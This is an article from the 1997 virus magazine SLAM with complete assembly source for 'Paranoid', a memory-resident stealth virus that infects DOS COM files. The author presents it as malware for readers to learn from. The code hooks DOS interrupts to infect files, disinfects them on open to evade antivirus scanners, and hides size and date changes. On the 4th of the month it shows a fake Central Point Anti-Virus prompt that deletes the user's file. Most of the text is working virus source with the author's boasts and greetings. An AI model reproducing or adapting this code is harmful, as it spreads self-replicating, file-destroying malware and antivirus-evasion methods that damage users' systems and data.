SLAM3.027: The ˜Paranoid˜ virus written by Virtual Daemon [SLAM]
˜Paranoid˜
written by Virtual Daemon for SLAM 1997 issue #3
Ø TSR: [˚]
Ø COM: [˚]
Ø EXE: [ ]
Ø BS/MBR: [ ]
Description:
- infect files on 4bh (load or execute), 3eh (close) and 4301h (set attr)
- desinfect files on 3dh (open) and 6c00h (extended open)
- size stealth on 11h/12h/4eh/4fh (find 1st/next FCB/DTA)
- time stealth on 5700h (get file date/time)
- restore file time/date/attributes
- infect read-only files
- Int 24h handler
- infect COMMAND.COM
- cool payload on the 4th day of the month! :)
- F-Prot, AVP, Toolkit, McAffe SCAN, etc... can't find a shit if the virus is active in memory... hehehe! :)
Well, I made this virus for the 3rd issue of SLAM Magazine. It's a full stealth COM infector (I haven't got the time to do it for EXE's too :( ).
The virus will desinfect on file open and re-infect on close. Besides that, it will infect on 4bh (load or execute) and on 4301h (set file attributes). The virus has also some size stealth features... this way, it will not report any size increase during find first/next functions. All this "functions" makes 'Paranoid' a pretty good infector. I've tested it with F-Prot 2.27, AVP, Dr.Solomon's Toolkit, AidsTest, McAfee Scan and others and NONE of them can trace it. That's bcoz when the AV's are trying to open the file, I desinfect it so they wont find shit, and when they're trying to close it, I will re-infect it... heheh...
Anyway, this is not a cool technical virus, and I know that there are plenty elites virus coders who already know how to make a shit like this. Anyway, for those who don't: here's a chance for you to learn!
The payload? Hehehe... Well, I like this one! Do U guys remember the old CPAV anti-virus system? It had an "immunize" option which could insert a code in an executable file. If the file was being modified in any way, the code gived the chance for the file to be restored. Ok... This is what Paranoid do: on the 4th day of the month (I was born on 4 september) it will activate a little code. It will appear the same shit words and options like CPAV's shit. So, the user will have 3 options: one to exit to DOS, one to continue the programs execution and the 3rd to recover the file. Of course, the majority of users (they're all LAMERS!) will choose the 3rd one...hehehe hehehe... but instead of recovering the virus will delete the file! :-))
Maybe for some of you, this payload sucks... well, I like it, and there's nothing you can do about it! ;-)
I didn't include an encryption system for 2 reasons:
- if the virus is active, no lamer can see the virus bcoz we're full stealth
- if a lamer will boot from a clean disk and will look at the file, he will see most of the virus looking like the CPAV anti-virus protection (all the strings from the end are exactly the same)
One last thing: the name of the virus come from a song of Green Day band called "Basket Case"! Green Day is one of my favourite bands so I think that this virus is dedicated to them! Love ya' guys! :)
-ÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕ-
Sometimes I give myself the CREEPS
Sometimes my mind plays tricks on me
It all keeps adding up
I think I'm CRACKING UP
Am I just ˜PARANOID˜?
Am I just STONED
( Green Day )
-ÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕ-
Greetz goes out to:
- all the SLAM ppl (NJ, Hyperlock, Cyborg, DarkSide, AuroDreph, Stealth Warrior, Dark Chakal, Death Knight LON, l0nerider and Cursor)
- MrSandman and the entire 29A crew: guys you're great! Love ya' all! ;)
- all the ppl from IRC on channel #virus: see ya soon!
- Yosha, Casio, Pockets: see ya soon on undernet!
- IR/G and Stealth: you're all elites! keep up the work!
- Quantum, Metabolis and the old VLAD crew: you were the BEST group from this earth, universe etc... ;-))
- Neophyte: come back brother! :'(
- and to all others that I forgot right now
.model tiny
.code
org 0
begin:
call start
start:
pop bp
sub bp,offset start ;get delta offset
push ds
push es
mov ax,'VD' ;check if already installed
int 21h
cmp bx,':)'
je complete ;don't install if already installed
mov ah,4ah
mov bx,0ffffh
int 21h
sub bx,(endheap-begin+15)/16+1
mov ah,4ah
int 21h
jc complete
sub word ptr ds:[2],(endheap-begin+15)/16+1
mov ah,48h
mov bx,(endheap-begin+15)/16
int 21h
jc complete
push ax
pop es
dec ax
push ax
pop ds
xor di,di ;F-Prot won't detect anything in memory! ;)
mov al,'Z'
mov byte ptr ds:[di],al
mov ax,8
mov word ptr ds:[di+1],ax
push cs ;DS=CS
pop ds
xor di,di
mov cx,(heap-begin)/2+1
mov si,bp
rep movsw ;load the virus in memory
xor ax,ax
mov ds,ax
push ds
lds ax,ds:[21h*4] ;save Int 21h vector
mov word ptr es:oldint21,ax
mov word ptr es:oldint21+2,ds
pop ds
mov word ptr ds:[21h*4],offset new21 ;put our Int 21h handler
mov ds:[21h*4+2],es
complete:
pop es
pop ds
lea si,[bp+offset jumpbuf] ;restore saved bytes
mov di,100h
push di
movsw ;move a word
movsb ; and a byte => 3 bytes (size of JMP)
retn ;return to host
new24:
mov al,3
iret
new21:
cmp ax,'VD' ;install?
jne continue
mov bx,':)'
iret
virus_name db '˙PARANOID˙' ;Yeah! This is the best part! ;)
signature db '[VD/SLAM]'
continue:
cmp ah,4bh ;load or execute?
jne fuck
jmp infect
fuck:
cmp ax,4301h ;set new attributes?
jne megafuck
jmp infect
megafuck:
cmp ah,3eh ;close file?
jne gigafuck
jmp close_infect
gigafuck:
cmp ah,3dh ;open file?
jne terrafuck
jmp desinfect
terrafuck:
cmp ax,6c00h ;extended open?
jne mgtfuck
jmp extended
mgtfuck:
cmp ah,11h ;find 1st FCB?
je FCB_stealth
cmp ah,12h ;find next FCB?
je FCB_stealth
cmp ah,4eh ;find 1st DTA?
je DTA_stealth
cmp ah,4fh ;find next DTA?
je DTA_stealth
cmp ax,5700h ;get file time/date?
jne exithandler
jmp time_stealth
exithandler:
db 0eah ;return to original Int21h
oldint21 dd ?
FCB_stealth:
pushf
push cs
call exithandler ;get the FCB dude! ;-)
or al,0 ;hmmm... errors? DID anyone SAID errors? ;)
jnz skip_dir ;wow! megashit! :( We must return...
push ax bx es
mov ah,51h ;get the PSP
int 21h
mov es,bx
cmp bx,es:[16h] ;check if it's a DIR call
jnz error
mov bx,dx ;get FCB offset
mov al,[bx] ;al=drive
push ax
mov ah,2fh ;get DTA
int 21h
pop ax
inc al
jnz no_ext
add bx,7 ;Extended FCB? Okie, dokie... bx=bx+7
no_ext:
cmp word ptr es:[bx+1fh],0 ;check if bigger
jnz error
mov ax,es:[bx+19h]
cmp ah,100 ;infected?
jb error ;nope! :(
ror ah,1 ;substract 100 years
sub ah,100
rol ah,1
mov es:[bx+19h],ax ;put back the new value
sub word ptr es:[bx+1dh],(heap-begin) ;do some stealth around here! :)
error:
pop es bx ax
skip_dir:
retf 2
DTA_stealth:
pushf
push cs
call exithandler
jc no_files ;errors? I HATE errors... :(
pushf
push ax di es bx
mov ah,2fh ;get DTA
int 21h
mov ax,es:[bx+18h]
cmp ah,100 ;infected?
jb not_inf ;nope... :(
cmp word ptr es:[bx+1ah],(heap-begin)
ja hide
cmp word ptr es:[bx+1Ch],0
je not_inf
hide:
ror ah,1 ;"adjust" the years...
sub ah,100
rol ah,1
mov es:[bx+18h],ax
sub word ptr es:[bx+1ah],(heap-begin) ;cut size
not_inf:
pop bx es di ax
popf
no_files:
retf 2
time_stealth:
pushf
call dword ptr cs:[oldint21]
jc shit
cmp dh,100 ;check if infected
jb no_way
ror dh,1 ;make it look "younger" with a century
sub dh,100
rol dh,1
no_way:
iret
shit:
retf 2
extended:
cmp dx,1
je yeah
jmp exithandler
yeah:
mov ah,3dh
mov al,bl
mov dx,si ;get the file's name in ds:dx
mov byte ptr ashit,1 ;mark as an extended call
desinfect:
push ax bx cx dx di si ds es
push ds
pop es ;ES=DS
mov cx,64 ;PATH+file name=65 (max)
mov di,dx
mov al,'.' ;search till '.' found
repne scasb ;repeat till cx=0
cmp word ptr ds:[di],'oc' ;check if extension is com or COM
je stepcomplete
cmp word ptr ds:[di],'OC'
jne other_shit ;not a COM/com file
stepcomplete:
cmp byte ptr ds:[di+2],'m'
je openfile
cmp byte ptr ds:[di+2],'M'
je openfile
other_shit:
jmp goaway
openfile:
mov ax,4300h ;get old attributes
int 21h
push cx
push dx
push ds
mov ax,4301h ;set new ones
xor cx,cx
pushf ;use a fake int 21h call, bcoz else we will
call dword ptr cs:[oldint21] ;enter in an infinite loop
mov ax,3d02h ;open file RW
pushf
call dword ptr cs:[oldint21]
xchg bx,ax
push cs cs
pop ds es ;CS=DS=ES
mov ax,5700h ;get time
pushf
call dword ptr cs:[oldint21]
mov ax,dx
cmp ah,100 ;check if infected
jnb us
jmp close_dis ;if not equal then don't stealth
us:
mov word ptr cs:[file_time],cx
mov word ptr cs:[file_date],dx
read_f4:
mov ah,3fh ;read the 1st 3 bytes
mov cx,3
lea dx,buffer
pushf
call dword ptr cs:[oldint21]
chk_markers:
cmp byte ptr buffer,0e9h ;check if it is a jmp.
jne close_dis ;not equal? then it's not infected!?!
mov ax,4202h ;go to EOF
xor cx,cx
cwd
int 21h
mov dx,ax ;save file size
push dx
mov cx,word ptr buffer+1 ;check if infected
add cx,(heap-begin)+3
cmp ax,cx
jne close_dis
sub dx,(heap-jumpbuf) ;go to where the JMP bytes are stored
xor cx,cx
mov ax,4200h
int 21h
mov ah,3fh ;read the original bytes in memory
mov cx,3
lea dx,buffer
pushf
call dword ptr cs:[oldint21]
mov ax,4200h ;go to BOF
xor cx,cx
cwd
int 21h
mov ah,40h ;write the original code
lea dx,buffer
mov cx,3
pushf
call dword ptr cs:[oldint21]
pop dx ;restore file size
sub dx,(heap-begin) ;substract the length of our virus
mov ax,4200h
xor cx,cx
int 21h
mov ah,40h ;truncate the file
xor cx,cx
pushf
call dword ptr cs:[oldint21]
close_dis:
mov ax,5701h
mov cx,word ptr cs:[file_time]
mov dx,word ptr cs:[file_date]
ror ah,1 ;restore original year
sub ah,100
rol ah,1
pushf
call dword ptr cs:[oldint21]
mov ah,3eh ;close the phile
pushf
call dword ptr cs:[oldint21]
mov ax,4301h ;restore attributes
pop ds
pop dx
pop cx
pushf
call dword ptr cs:[oldint21]
goaway:
pop es ds si di dx cx bx ax
cmp byte ptr ashit,1 ;check if was an extended open
jne notex ;nope
mov ax,6c00h ;set ax to 6c00h
mov dx,1 ;set dx to 1
mov byte ptr ashit,0 ;set the check variable to 0
notex:
jmp exithandler
jumpbuf db 0cdh,20h,0
infect:
push ax bx cx dx si di ds es
push ds
push dx
mov byte ptr cs:[sclose],0 ;set the infect checking variable to 0
yoyo_check: ;it's payload time! hehehe... ;)
mov ah,2ah
int 21h
cmp dl,4
je yep
jmp nope
yep:
push cs
pop ds
mov ah,9h
lea dx,yooo
int 21h
ag:
mov ah,0eh ;this make that funny noise
mov al,07h
xor bh,bh
int 10h
mov ah,1
int 21h
or al,32 ;check for both upper and lower cases
cmp al,'e' ;do some checking
je okie
cmp al,'c'
je nope
cmp al,'r'
je np
mov ah,2
mov dl,8
int 21h
jmp ag
np:
mov ah,41h ;wrong answer? delete the phile... heheh. :)
pop dx
pop ds
int 21h
jc okie
push cs
pop ds
mov ah,9h
lea dx,U_out
int 21h
okie:
push cs
pop ds
mov ah,9h
lea dx,crlf
int 21h
mov ah,4ch ;forced exit to DOS
int 21h
nope:
mov ax,3524h ;save Int 24h vector
int 21h
mov word ptr cs:[old_int24],bx
mov word ptr cs:[old_int24+2],es
push cs
pop ds
lea dx,new24 ;set a new Int 24h handler
mov ax,2524h
int 21h
pop dx
pop ds
mov ax,4300h ;get file attributes
int 21h
push ds
push dx
push cx
mov ax,4301h ;set new attributes (archive only)
xor cx,cx
pushf
call dword ptr cs:[oldint21]
mov ax,3d02h ;open the file RW
pushf
call dword ptr cs:[oldint21]
xchg ax,bx
infect_close:
mov ax,5700h ;get file's date/time
pushf
call dword ptr cs:[oldint21]
mov ax,dx
cmp ah,100 ;check if infected
jb shita
jmp close_file ;infected? close the file
shita:
mov word ptr cs:[file_time],cx
mov word ptr cs:[file_date],dx
push cs cs ;CS=DS=ES
pop ds es
mov ah,3fh ;read from file the first 3 bytes
lea dx,buffer ;save them into our buffer
mov cx,3
pushf
call dword ptr cs:[oldint21]
mov ax,4202h ;go to EOF
xor cx,cx
cwd
pushf
call dword ptr cs:[oldint21]
mov word ptr file_size,ax
mov word ptr file_size+2,dx
cmp word ptr buffer,'MZ' ;check if EXE
je close_file
cmp word ptr buffer,'ZM'
je close_file
mov ax,word ptr file_size ;check if too big
cmp ax,65535-(endheap-begin)
ja close_file
cmp ax,(endheap-begin) ;check if too small
jbe close_file
mov cx,word ptr buffer+1 ;check if already infected
add cx,heap-begin+3
cmp ax,cx
je close_file
mov di,offset jumpbuf ;prepare new JMP
mov si,offset buffer
movsb
movsw
mov byte ptr [offset buffer],0e9h
sub ax,3
mov word ptr [offset buffer+1],ax
mov ah,40h ;write the virus to host
lea dx,begin
mov cx,heap-begin
int 21h
mov ax,4200h ;go to BOF
xor cx,cx
cwd
pushf
call dword ptr cs:[oldint21]
mov ah,40h ;write the new JMP
lea dx,buffer
mov cx,3
pushf
call dword ptr cs:[oldint21]
mov ax,5701h ;set old file's time/date
mov cx,word ptr cs:[file_time]
mov dx,word ptr cs:[file_date]
ror dh,1 ;mark the file for stealth
add dh,100
rol dh,1
pushf
call dword ptr cs:[oldint21]
close_file:
cmp byte ptr cs:[sclose],1 ;check if it's a close request or a infect
je out_of_here ;close? hmmm... ok!
mov ah,3eh ;close the file
pushf
call dword ptr cs:[oldint21]
mov ax,4301h ;set old attributes
pop cx
pop dx
pop ds
pushf
call dword ptr cs:[oldint21]
mov ds,word ptr cs:[old_int24+2]
mov dx,word ptr cs:[old_int24]
mov ax,2524h ;restore the Int 24h handler
int 21h
out_of_here:
mov byte ptr cs:[sclose],0 ;reset variable to 0
exit:
pop es ds si di dx cx bx ax
goback:
jmp exithandler
close_infect:
cmp bx,4 ;check if AUX/NULL/CON
jbe goback
push ax bx cx dx di si ds es
push bx
mov ax,1220h
int 2fh
mov ax,1216h ;use SFT to get the extension
mov bl,byte ptr es:[di]
int 2fh
pop bx
add di,40 ;di points to extension
cmp word ptr es:[di],'OC' ;check if it's a COM file
jne close_it
cmp word ptr es:[di+2],'M'
jne close_it
mov byte ptr es:[di-26h],2 ;mark file as open in RW mode
mov ax,4200h
xor cx,cx
cwd
int 21h
mov byte ptr cs:[sclose],1 ;mark it as a close request
jmp infect_close
close_it:
jmp short exit
U_out db 0dh,0ah,'Wrong choice sucker! hehehe... ;-)','$'
crlf db 0dh,0ah,'$'
yooo db 'Central Point Anti-Virus (c) 1993 CPS',0dh,0ah
db 'Self Integrity Check warning - File was changed !',0dh,0ah
db 'Choose an option:',0dh,0ah
db '[R] Self Reconstruction.',0dh,0ah
db '[C] Continue execution.',0dh,0ah
db '[E] Exit to DOS.',0dh,0ah
db 'Press R,C or E:$'
old_int24 dd ?
heap:
file_size dd ?
file_time dw ?
file_date dw ?
sclose db 0
ashit db ?
buffer db 3 dup (?)
endheap:
end begin